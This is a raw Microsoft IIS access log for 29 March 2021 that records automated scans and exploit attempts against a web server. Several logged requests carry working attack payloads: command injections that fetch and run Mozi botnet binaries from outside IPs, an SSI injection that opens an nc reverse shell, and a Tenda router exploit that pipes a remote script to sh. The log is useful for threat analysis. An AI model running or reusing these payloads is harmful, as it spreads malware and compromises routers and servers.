#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 00:15:58 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 00:15:58 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+5.1;+rv:9.0.1)+Gecko/20100101+Firefox/9.0.1 - 200 0 0 453 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 01:35:34 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 01:35:34 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 453 2021-03-29 01:35:35 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 421 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 02:30:32 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 02:30:32 192.168.0.14 GET /w00tw00t.at.blackhats.romanian.anti-sec:) - 80 - 192.168.0.1 ZmEu - 404 0 2 281 2021-03-29 02:30:32 192.168.0.14 GET /phpMyAdmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 203 2021-03-29 02:30:32 192.168.0.14 GET /phpmyadmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 203 2021-03-29 02:30:34 192.168.0.14 GET /pma/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 171 2021-03-29 02:30:34 192.168.0.14 GET /myadmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 187 2021-03-29 02:30:34 192.168.0.14 GET /MyAdmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 187 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 03:05:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 03:05:02 192.168.0.14 GET /shell cd+/tmp;rm+-rf+*;wget+http://115.48.5.19:36036/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 80 - 192.168.0.1 Hello,+world - 404 0 2 578 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 05:09:12 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 05:09:12 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 500 2021-03-29 05:14:44 192.168.0.14 GET /incl/image_test.shtml camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2045.148.10.45%209772%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e 80 - 192.168.0.1 - - 404 0 2 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 05:44:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 05:44:49 192.168.0.14 GET /goform/setUsbUnload/.js deviceName=A;wget%20http%3A//dns.cyberium.cc/script/tenda%20-O-|sh 80 - 192.168.0.1 python-requests/2.22.0 - 404 0 2 249 2021-03-29 05:51:04 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 421 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 06:56:11 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 06:56:11 192.168.0.14 HEAD / - 80 - 192.168.0.1 - - 200 0 0 515 2021-03-29 06:56:13 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 64 265 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 07:25:44 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 07:25:44 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 406 2021-03-29 07:30:13 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 187 2021-03-29 07:32:40 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 171 2021-03-29 07:35:45 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 187 2021-03-29 07:46:26 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 171 2021-03-29 08:00:30 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 171 2021-03-29 08:13:44 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 250 2021-03-29 08:17:27 192.168.0.14 GET /index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 - 404 0 2 93 2021-03-29 08:17:27 192.168.0.14 GET /phpmyadmin/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 - 404 0 2 203 2021-03-29 08:21:35 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 187 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 08:53:11 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 08:53:11 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 375 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 09:15:42 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 09:15:42 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 375 2021-03-29 09:17:39 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 203 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 09:33:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 09:33:59 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 171 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 11:27:31 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 11:27:31 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 721 2021-03-29 11:41:58 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 408 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 12:06:11 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 12:06:11 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 516 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 12:49:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 12:49:45 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 500 2021-03-29 12:55:24 192.168.0.14 GET /phpmyadmin/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/69.0.3464.0+Safari/537.36 - 404 0 2 93 2021-03-29 12:55:24 192.168.0.14 GET /pmd/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/69.0.3464.0+Safari/537.36 - 404 0 2 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 13:11:32 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 13:11:32 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 296 2021-03-29 13:18:00 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 343 2021-03-29 13:20:39 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/66.0.3359.117+Safari/537.36 - 200 0 0 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 15:38:33 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 15:38:33 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 64 500 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 15:59:25 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 15:59:25 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 16:23:35 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 16:23:35 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 515 2021-03-29 16:33:44 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 1236 13048 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 19:03:43 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 19:03:43 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 531 2021-03-29 19:03:44 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 390 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 21:51:25 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 21:51:25 192.168.0.14 HEAD / - 80 - 192.168.0.1 - - 200 0 0 609 2021-03-29 21:51:25 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 64 125 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-29 23:15:27 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-29 23:15:27 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.175.64.250:53379/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 375